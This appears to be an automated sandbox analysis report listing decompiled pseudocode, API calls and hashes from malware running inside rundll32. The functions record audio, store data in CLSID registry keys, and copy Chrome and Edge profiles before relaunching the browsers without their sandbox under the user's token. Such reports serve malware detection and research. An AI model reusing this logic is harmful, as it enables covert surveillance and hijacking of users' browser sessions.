                                                                                              • Instruction Fuzzy Hash: 9F11A2722183006FD350AB58DC49FBB77DCEB88715F00060EF999C60C0EA74E945C766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04251550(intOrPtr _a4) {
                                                                                              				struct tagMSG _v32;
                                                                                              				intOrPtr _t19;
                                                                                              				signed int _t30;
                                                                                              				intOrPtr _t34;
                                                                                              
                                                                                              				if(GetMessageW( &_v32, 0, 0, 0) == 0) {
                                                                                              					L7:
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t34 = _a4;
                                                                                              					do {
                                                                                              						_t19 = _v32.message;
                                                                                              						if(_t19 != 0x3c0) {
                                                                                              							L5:
                                                                                              							if(_t19 == 0x3bf) {
                                                                                              								goto L7;
                                                                                              							} else {
                                                                                              								goto L6;
                                                                                              							}
                                                                                              						} else {
                                                                                              							SetEvent( *(_t34 + 0x24));
                                                                                              							WaitForSingleObject( *(_t34 + 0x28), 0xffffffff);
                                                                                              							 *((intOrPtr*)(_t34 + 0x1c)) = 1;
                                                                                              							_t30 = waveInAddBuffer( *(_t34 + 0x18),  *(_t34 + 0x30 + (1 -  *((intOrPtr*)(_t34 + 0x1c))) * 4), 0x20);
                                                                                              							if(_t30 != 0) {
                                                                                              								return _t30 | 0xffffffff;
                                                                                              							} else {
                                                                                              								_t19 = _v32.message;
                                                                                              								goto L5;
                                                                                              							}
                                                                                              						}
                                                                                              						goto L9;
                                                                                              						L6:
                                                                                              						TranslateMessage( &_v32);
                                                                                              						DispatchMessageW( &_v32);
                                                                                              					} while (GetMessageW( &_v32, 0, 0, 0) != 0);
                                                                                              					goto L7;
                                                                                              				}
                                                                                              				L9:
                                                                                              			}







                                                                                              0x0425156d
                                                                                              0x042515e8
                                                                                              0x042515ee
                                                                                              0x0425156f
                                                                                              0x0425156f
                                                                                              0x04251580
                                                                                              0x04251580
                                                                                              0x04251588
                                                                                              0x042515bf
                                                                                              0x042515c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425158a
                                                                                              0x0425158d
                                                                                              0x04251598
                                                                                              0x042515a8
                                                                                              0x042515b2
                                                                                              0x042515ba
                                                                                              0x042515fa
                                                                                              0x042515bc
                                                                                              0x042515bc
                                                                                              0x00000000
                                                                                              0x042515bc
                                                                                              0x042515ba
                                                                                              0x00000000
                                                                                              0x042515c6
                                                                                              0x042515ca
                                                                                              0x042515d0
                                                                                              0x042515e2
                                                                                              0x00000000
                                                                                              0x04251580
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04251569
                                                                                              • SetEvent.KERNEL32(?), ref: 0425158D
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04251598
                                                                                              • waveInAddBuffer.WINMM(?,?,00000020), ref: 042515B2
                                                                                              • TranslateMessage.USER32(?), ref: 042515CA
                                                                                              • DispatchMessageW.USER32(?), ref: 042515D0
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 042515E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                                                                              • String ID:
                                                                                              • API String ID: 3294988761-0
                                                                                              • Opcode ID: a924aa1b8f84dd8742226dbcca1061667fe0704f1e1c7b60f94a85ada1161882
                                                                                              • Instruction ID: 47270a11e5bc351979091d1e030a22570451e6494e44871f2a39069647c601a2
                                                                                              • Opcode Fuzzy Hash: a924aa1b8f84dd8742226dbcca1061667fe0704f1e1c7b60f94a85ada1161882
                                                                                              • Instruction Fuzzy Hash: DB118672B04209ABDB20AEA9EC49F6AB7B8EB08765F100625FA11D61D0D735F8168B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E04267C90(void* __ecx, signed char* _a4) {
                                                                                              				void* _t22;
                                                                                              				intOrPtr _t23;
                                                                                              				void* _t28;
                                                                                              				intOrPtr* _t31;
                                                                                              				intOrPtr _t32;
                                                                                              
                                                                                              				_t28 = __ecx;
                                                                                              				_t22 = ( *_a4 & 0x000000ff) + 0xffffffe1;
                                                                                              				if(_t22 > 0x5c) {
                                                                                              					L7:
                                                                                              					_t23 =  *((intOrPtr*)(_t28 + 4));
                                                                                              					_t31 =  *((intOrPtr*)(_t23 + 0x20));
                                                                                              					 *(_t23 + 0x44) = 1;
                                                                                              					if(_t31 != 0) {
                                                                                              						L10:
                                                                                              						return  *((intOrPtr*)( *_t31 + 4))();
                                                                                              					}
                                                                                              					_t32 =  *((intOrPtr*)(_t23 + 0x24));
                                                                                              					if(_t32 != 0) {
                                                                                              						_t31 = _t32 + 4;
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					return _t23;
                                                                                              				} else {
                                                                                              					switch( *((intOrPtr*)(( *(_t22 + 0x4267d70) & 0x000000ff) * 4 +  &M04267D58))) {
                                                                                              						case 0:
                                                                                              							__eax = __ebx + 0xec;
                                                                                              							__eax = InterlockedExchange(__ebx + 0xec, 1);
                                                                                              							 *((intOrPtr*)(__ebx + 0xe8)) = 0x3f;
                                                                                              							return __eax;
                                                                                              							goto L12;
                                                                                              						case 1:
                                                                                              							__eax = __ebx + 0xec;
                                                                                              							__eax = InterlockedExchange(__ebx + 0xec, 0);
                                                                                              							 *((intOrPtr*)(__ebx + 0xe8)) = 0x1f;
                                                                                              							return __eax;
                                                                                              							goto L12;
                                                                                              						case 2:
                                                                                              							_push(__edi);
                                                                                              							__edi =  *(__ecx + 5);
                                                                                              							__ebx + 0x10 = InterlockedExchange(__ebx + 0x10,  *(__ecx + 1));
                                                                                              							__eax = __ebx + 0x14;
                                                                                              							__eax = InterlockedExchange(__ebx + 0x14, __edi);
                                                                                              							_pop(__edi);
                                                                                              							return __eax;
                                                                                              							goto L12;
                                                                                              						case 3:
                                                                                              							__eax =  *(__ecx + 1);
                                                                                              							 *(__ebx + 0xf4) = __eax;
                                                                                              							return __eax;
                                                                                              							goto L12;
                                                                                              						case 4:
                                                                                              							return SetEvent( *(__ecx + 0x18));
                                                                                              							goto L12;
                                                                                              						case 5:
                                                                                              							goto L7;
                                                                                              					}
                                                                                              				}
                                                                                              				L12:
                                                                                              			}








                                                                                              0x04267c94
                                                                                              0x04267c9c
                                                                                              0x04267ca2
                                                                                              0x04267d30
                                                                                              0x04267d30
                                                                                              0x04267d33
                                                                                              0x04267d36
                                                                                              0x04267d3f
                                                                                              0x04267d4b
                                                                                              0x00000000
                                                                                              0x04267d4d
                                                                                              0x04267d41
                                                                                              0x04267d46
                                                                                              0x04267d48
                                                                                              0x00000000
                                                                                              0x04267d48
                                                                                              0x04267d52
                                                                                              0x04267ca8
                                                                                              0x04267caf
                                                                                              0x00000000
                                                                                              0x04267ce8
                                                                                              0x04267cef
                                                                                              0x04267cf5
                                                                                              0x04267d01
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04267d06
                                                                                              0x04267d0d
                                                                                              0x04267d13
                                                                                              0x04267d1f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04267cc4
                                                                                              0x04267cc8
                                                                                              0x04267ccf
                                                                                              0x04267cd6
                                                                                              0x04267cda
                                                                                              0x04267ce0
                                                                                              0x04267ce3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04267d22
                                                                                              0x04267d25
                                                                                              0x04267d2d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04267cc1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04267caf
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • SetEvent.KERNEL32(?), ref: 04267CB9
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 04267CCF
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 04267CDA
                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 04267CEF
                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 04267D0D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExchangeInterlocked$Event
                                                                                              • String ID: ?
                                                                                              • API String ID: 767157976-1684325040
                                                                                              • Opcode ID: fbd19963ab466021192dc82d621fb19bf71d9da50f8fc4c93afce5b0fb9e3218
                                                                                              • Instruction ID: e499c4910f551dd21c406f5611ffac5aa1a33160a753c7bee3dab2373bf239c2
                                                                                              • Opcode Fuzzy Hash: fbd19963ab466021192dc82d621fb19bf71d9da50f8fc4c93afce5b0fb9e3218
                                                                                              • Instruction Fuzzy Hash: B6215E76214104DFDB14DF54F888FA67BA8EB98318F1485ABE90ACF152C737D821CB20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0428C196(intOrPtr _a4) {
                                                                                              				void* _t18;
                                                                                              				intOrPtr _t45;
                                                                                              
                                                                                              				_t45 = _a4;
                                                                                              				if(_t45 != 0) {
                                                                                              					E0428C15A(_t45, 7);
                                                                                              					_t2 = _t45 + 0x1c; // 0x1d
                                                                                              					E0428C15A(_t2, 7);
                                                                                              					_t3 = _t45 + 0x38; // 0x39
                                                                                              					E0428C15A(_t3, 0xc);
                                                                                              					_t4 = _t45 + 0x68; // 0x69
                                                                                              					E0428C15A(_t4, 0xc);
                                                                                              					_t5 = _t45 + 0x98; // 0x99
                                                                                              					E0428C15A(_t5, 2);
                                                                                              					E042884AD( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                              					E042884AD( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                              					E042884AD( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                              					_t9 = _t45 + 0xb4; // 0xb5
                                                                                              					E0428C15A(_t9, 7);
                                                                                              					_t10 = _t45 + 0xd0; // 0xd1
                                                                                              					E0428C15A(_t10, 7);
                                                                                              					_t11 = _t45 + 0xec; // 0xed
                                                                                              					E0428C15A(_t11, 0xc);
                                                                                              					_t12 = _t45 + 0x11c; // 0x11d
                                                                                              					E0428C15A(_t12, 0xc);
                                                                                              					_t13 = _t45 + 0x14c; // 0x14d
                                                                                              					E0428C15A(_t13, 2);
                                                                                              					E042884AD( *((intOrPtr*)(_t45 + 0x154)));
                                                                                              					E042884AD( *((intOrPtr*)(_t45 + 0x158)));
                                                                                              					E042884AD( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                              					return E042884AD( *((intOrPtr*)(_t45 + 0x160)));
                                                                                              				}
                                                                                              				return _t18;
                                                                                              			}





                                                                                              0x0428c19c
                                                                                              0x0428c1a1
                                                                                              0x0428c1aa
                                                                                              0x0428c1af
                                                                                              0x0428c1b5
                                                                                              0x0428c1ba
                                                                                              0x0428c1c0
                                                                                              0x0428c1c5
                                                                                              0x0428c1cb
                                                                                              0x0428c1d0
                                                                                              0x0428c1d9
                                                                                              0x0428c1e4
                                                                                              0x0428c1ef
                                                                                              0x0428c1fa
                                                                                              0x0428c1ff
                                                                                              0x0428c208
                                                                                              0x0428c20d
                                                                                              0x0428c216
                                                                                              0x0428c21e
                                                                                              0x0428c227
                                                                                              0x0428c22c
                                                                                              0x0428c235
                                                                                              0x0428c23a
                                                                                              0x0428c243
                                                                                              0x0428c24e
                                                                                              0x0428c259
                                                                                              0x0428c264
                                                                                              0x00000000
                                                                                              0x0428c274
                                                                                              0x0428c279

                                                                                              APIs
                                                                                                • Part of subcall function 0428C15A: _free.LIBCMT ref: 0428C183
                                                                                              • _free.LIBCMT ref: 0428C1E4
                                                                                                • Part of subcall function 042884AD: HeapFree.KERNEL32(00000000,00000000,?,042812C5,00000001,00000001), ref: 042884C3
                                                                                                • Part of subcall function 042884AD: GetLastError.KERNEL32(D33DB39D,?,042812C5,00000001,00000001), ref: 042884D5
                                                                                              • _free.LIBCMT ref: 0428C1EF
                                                                                              • _free.LIBCMT ref: 0428C1FA
                                                                                              • _free.LIBCMT ref: 0428C24E
                                                                                              • _free.LIBCMT ref: 0428C259
                                                                                              • _free.LIBCMT ref: 0428C264
                                                                                              • _free.LIBCMT ref: 0428C26F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: f0a7334c6dbb5677564b686ea8814ec6d71082e467f4995945020664cc9d3a81
                                                                                              • Instruction ID: 0a48933a36b45a14518b74356f5c60f7b7adca5f814907c32b910ca985763ddc
                                                                                              • Opcode Fuzzy Hash: f0a7334c6dbb5677564b686ea8814ec6d71082e467f4995945020664cc9d3a81
                                                                                              • Instruction Fuzzy Hash: 7E117F327A2B04AAE620B7B1CC85FDF7B9C6F00714F808C1DA79A6B1D1DB35B51496A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E0425A080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				signed int _t14;
                                                                                              				intOrPtr* _t16;
                                                                                              				int _t26;
                                                                                              				intOrPtr _t32;
                                                                                              				void* _t37;
                                                                                              				int _t41;
                                                                                              				char* _t43;
                                                                                              				signed int _t44;
                                                                                              
                                                                                              				_t14 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t14 ^ _t44;
                                                                                              				_t43 = __ecx;
                                                                                              				_t16 = __ecx;
                                                                                              				_t37 = __ecx + 2;
                                                                                              				do {
                                                                                              					_t32 =  *_t16;
                                                                                              					_t16 = _t16 + 2;
                                                                                              				} while (_t32 != 0);
                                                                                              				_t41 = 2 + (_t16 - _t37 >> 1) * 2;
                                                                                              				E042654D0(__ecx, _t41);
                                                                                              				E04266050(__ebx, L"Global",  &_v88, _t41, __ecx);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_v612 = 0;
                                                                                              				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                                                              				if(_t26 == 0) {
                                                                                              					RegSetValueExW(_v612, "3", _t26, 3, _t43, _t41);
                                                                                              					RegCloseKey(_v612);
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t44);
                                                                                              			}















                                                                                              0x0425a089
                                                                                              0x0425a090
                                                                                              0x0425a094
                                                                                              0x0425a096
                                                                                              0x0425a099
                                                                                              0x0425a0a0
                                                                                              0x0425a0a0
                                                                                              0x0425a0a3
                                                                                              0x0425a0a6
                                                                                              0x0425a0b1
                                                                                              0x0425a0ba
                                                                                              0x0425a0c7
                                                                                              0x0425a0dc
                                                                                              0x0425a0e5
                                                                                              0x0425a111
                                                                                              0x0425a119
                                                                                              0x0425a12b
                                                                                              0x0425a137
                                                                                              0x0425a137
                                                                                              0x0425a14c

                                                                                              APIs
                                                                                              • wsprintfW.USER32 ref: 0425A0DC
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 0425A111
                                                                                              • RegSetValueExW.ADVAPI32(00000000,0429E120,00000000,00000003), ref: 0425A12B
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425A137
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuewsprintf
                                                                                              • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 4211343355-1865207932
                                                                                              • Opcode ID: c6b73f3e9206cc4bc773118ee261632a7874f3be53c70d168b182c509c1c26d0
                                                                                              • Instruction ID: c3827313e191079a9cd5905d71dc81132e611bcab977442d7586263f18631c43
                                                                                              • Opcode Fuzzy Hash: c6b73f3e9206cc4bc773118ee261632a7874f3be53c70d168b182c509c1c26d0
                                                                                              • Instruction Fuzzy Hash: E3116331714218BBDB20AF98EC4AFAAB7BCEB84704F104195F906E7190DB756E04DB95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E0425A150(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				signed int _t14;
                                                                                              				char* _t20;
                                                                                              				int _t26;
                                                                                              				char _t33;
                                                                                              				char* _t38;
                                                                                              				int _t41;
                                                                                              				char* _t43;
                                                                                              				signed int _t44;
                                                                                              
                                                                                              				_t14 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t14 ^ _t44;
                                                                                              				_t43 = __ecx;
                                                                                              				E04266050(__ebx, L"Global",  &_v88, __edi, __ecx);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_t20 = _t43;
                                                                                              				_t38 =  &(_t20[2]);
                                                                                              				do {
                                                                                              					_t33 =  *_t20;
                                                                                              					_t20 =  &(_t20[2]);
                                                                                              				} while (_t33 != 0);
                                                                                              				_t41 = 2 + (_t20 - _t38 >> 1) * 2;
                                                                                              				E042654D0(_t43, _t41);
                                                                                              				_v612 = 0;
                                                                                              				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                                                              				if(_t26 == 0) {
                                                                                              					RegSetValueExW(_v612, "2", _t26, 3, _t43, _t41);
                                                                                              					RegCloseKey(_v612);
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t44);
                                                                                              			}















                                                                                              0x0425a159
                                                                                              0x0425a160
                                                                                              0x0425a164
                                                                                              0x0425a16f
                                                                                              0x0425a184
                                                                                              0x0425a18a
                                                                                              0x0425a18f
                                                                                              0x0425a192
                                                                                              0x0425a192
                                                                                              0x0425a195
                                                                                              0x0425a198
                                                                                              0x0425a1a3
                                                                                              0x0425a1ac
                                                                                              0x0425a1b9
                                                                                              0x0425a1dd
                                                                                              0x0425a1e5
                                                                                              0x0425a1f7
                                                                                              0x0425a203
                                                                                              0x0425a203
                                                                                              0x0425a218

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0425A184
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0425A1DD
                                                                                              • RegSetValueExW.ADVAPI32(00000000,0429E124,00000000,00000003), ref: 0425A1F7
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425A203
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                              • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 73588525-1865207932
                                                                                              • Opcode ID: 828a09fbc0b02100e6a9b82576a8c4bade4aa628103873cd45b09702b5fdc1d9
                                                                                              • Instruction ID: c4ab4807baaed1941df8e3b603bdca643782dfe27854554e131f85be398ddcfd
                                                                                              • Opcode Fuzzy Hash: 828a09fbc0b02100e6a9b82576a8c4bade4aa628103873cd45b09702b5fdc1d9
                                                                                              • Instruction Fuzzy Hash: 7C118631714218BBDB20EB98EC4AFEAB77CFB84704F104195E906E7190EBB56E04DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 57%
                                                                                              			E04256880(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v12;
                                                                                              				short _v536;
                                                                                              				short _v1056;
                                                                                              				char _v1060;
                                                                                              				char _v1076;
                                                                                              				signed int _t18;
                                                                                              				void* _t20;
                                                                                              				void* _t48;
                                                                                              				signed int _t50;
                                                                                              
                                                                                              				_t18 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t18 ^ _t50;
                                                                                              				_t48 = __ecx;
                                                                                              				_v1060 = 0x104;
                                                                                              				_t20 = E04267240( &_v536,  &_v1060, __eflags);
                                                                                              				_t56 = _t20;
                                                                                              				if(_t20 == 0) {
                                                                                              					__eflags = _v12 ^ _t50;
                                                                                              					return E04275AFE(_v12 ^ _t50);
                                                                                              				} else {
                                                                                              					lstrcatW( &_v536, L"\\AppData\\Local\\Google\\Chrome\\User Data");
                                                                                              					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
                                                                                              					E042673D0(__ebx,  &_v536,  &_v1056, _t48, __esi);
                                                                                              					wsprintfW( &_v536, L"cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					asm("movups [ebp-0x430], xmm0");
                                                                                              					_push( &_v1076);
                                                                                              					_push( &_v536);
                                                                                              					E042672E0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
                                                                                              					return E04275AFE(_v12 ^ _t50,  &_v536);
                                                                                              				}
                                                                                              			}












                                                                                              0x04256889
                                                                                              0x04256890
                                                                                              0x04256894
                                                                                              0x04256896
                                                                                              0x042568ac
                                                                                              0x042568b1
                                                                                              0x042568b3
                                                                                              0x04256951
                                                                                              0x0425695c
                                                                                              0x042568b9
                                                                                              0x042568c5
                                                                                              0x042568e1
                                                                                              0x042568f3
                                                                                              0x0425690b
                                                                                              0x0425691d
                                                                                              0x04256920
                                                                                              0x04256927
                                                                                              0x04256931
                                                                                              0x04256933
                                                                                              0x04256949
                                                                                              0x04256949

                                                                                              APIs
                                                                                                • Part of subcall function 04267240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,042568B1), ref: 04267269
                                                                                                • Part of subcall function 04267240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04267279
                                                                                                • Part of subcall function 04267240: CloseHandle.KERNEL32(?,?,?,?,042568B1), ref: 042672A0
                                                                                              • lstrcatW.KERNEL32(?,\AppData\Local\Google\Chrome\User Data), ref: 042568C5
                                                                                              • wsprintfW.USER32 ref: 042568E1
                                                                                                • Part of subcall function 042673D0: lstrcpyW.KERNEL32(?,?), ref: 04267414
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,0429F170), ref: 0426742C
                                                                                                • Part of subcall function 042673D0: CreateDirectoryW.KERNEL32(?,00000000), ref: 04267431
                                                                                                • Part of subcall function 042673D0: GetLastError.KERNEL32 ref: 04267441
                                                                                                • Part of subcall function 042673D0: FindFirstFileW.KERNEL32(?,?), ref: 0426745C
                                                                                                • Part of subcall function 042673D0: lstrcpyW.KERNEL32(?,?), ref: 042674A3
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,0429D92C), ref: 042674B5
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,?), ref: 042674C5
                                                                                                • Part of subcall function 042673D0: lstrcpyW.KERNEL32(?,?), ref: 042674EA
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,0429D92C), ref: 042674FC
                                                                                                • Part of subcall function 042673D0: lstrcatW.KERNEL32(?,?), ref: 0426750C
                                                                                                • Part of subcall function 042673D0: lstrcmpW.KERNEL32(?,0429D940), ref: 04267523
                                                                                                • Part of subcall function 042673D0: lstrcmpW.KERNEL32(?,0429D944), ref: 04267535
                                                                                              • wsprintfW.USER32 ref: 0425690B
                                                                                                • Part of subcall function 042672E0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04267329
                                                                                                • Part of subcall function 042672E0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04267339
                                                                                                • Part of subcall function 042672E0: CreateProcessAsUserW.ADVAPI32(?,00000000,04256938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04267386
                                                                                              Strings
                                                                                              • cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 04256905
                                                                                              • %s%s, xrefs: 042568DB
                                                                                              • \AppData\Local\Google\Chrome\User Data, xrefs: 042568B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrcat$lstrcpy$AddressCreateLibraryLoadProclstrcmpwsprintf$CloseDirectoryErrorFileFindFirstHandleLastProcessUser
                                                                                              • String ID: %s%s$\AppData\Local\Google\Chrome\User Data$cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                                                              • API String ID: 3549361973-1696747008
                                                                                              • Opcode ID: 35c0f2975818038d171771dec60bb88046ad3c03a2e438bf9e0baf1501ea4f75
                                                                                              • Instruction ID: e41e10fb87317f28ea73dff6a89002c914b1495eb945356e115be816fafd07ee
                                                                                              • Opcode Fuzzy Hash: 35c0f2975818038d171771dec60bb88046ad3c03a2e438bf9e0baf1501ea4f75
                                                                                              • Instruction Fuzzy Hash: 4F2184B1F6010D5BCF20EB64DD849DAB3BCEF54308F4041E5A50992040EB70AA96CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 57%
                                                                                              			E04256960(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v12;
                                                                                              				short _v536;
                                                                                              				short _v1056;
                                                                                              				char _v1060;
                                                                                              				char _v1076;
                                                                                              				signed int _t18;
                                                                                              				void* _t20;
                                                                                              				void* _t48;
                                                                                              				signed int _t50;
                                                                                              
                                                                                              				_t18 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t18 ^ _t50;
                                                                                              				_t48 = __ecx;
                                                                                              				_v1060 = 0x104;
                                                                                              				_t20 = E04267240( &_v536,  &_v1060, __eflags);
                                                                                              				_t56 = _t20;
                                                                                              				if(_t20 == 0) {
                                                                                              					__eflags = _v12 ^ _t50;
                                                                                              					return E04275AFE(_v12 ^ _t50);
                                                                                              				} else {
                                                                                              					lstrcatW( &_v536, L"\\AppData\\Local\\Microsoft\\Edge\\User Data");
                                                                                              					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
                                                                                              					E042673D0(__ebx,  &_v536,  &_v1056, _t48, __esi);
                                                                                              					wsprintfW( &_v536, L"cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					asm("movups [ebp-0x430], xmm0");
                                                                                              					_push( &_v1076);
                                                                                              					_push( &_v536);
                                                                                              					E042672E0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
                                                                                              					return E04275AFE(_v12 ^ _t50,  &_v536);
                                                                                              				}
                                                                                              			}












                                                                                              0x04256969
                                                                                              0x04256970
                                                                                              0x04256974
                                                                                              0x04256976
                                                                                              0x0425698c
                                                                                              0x04256991
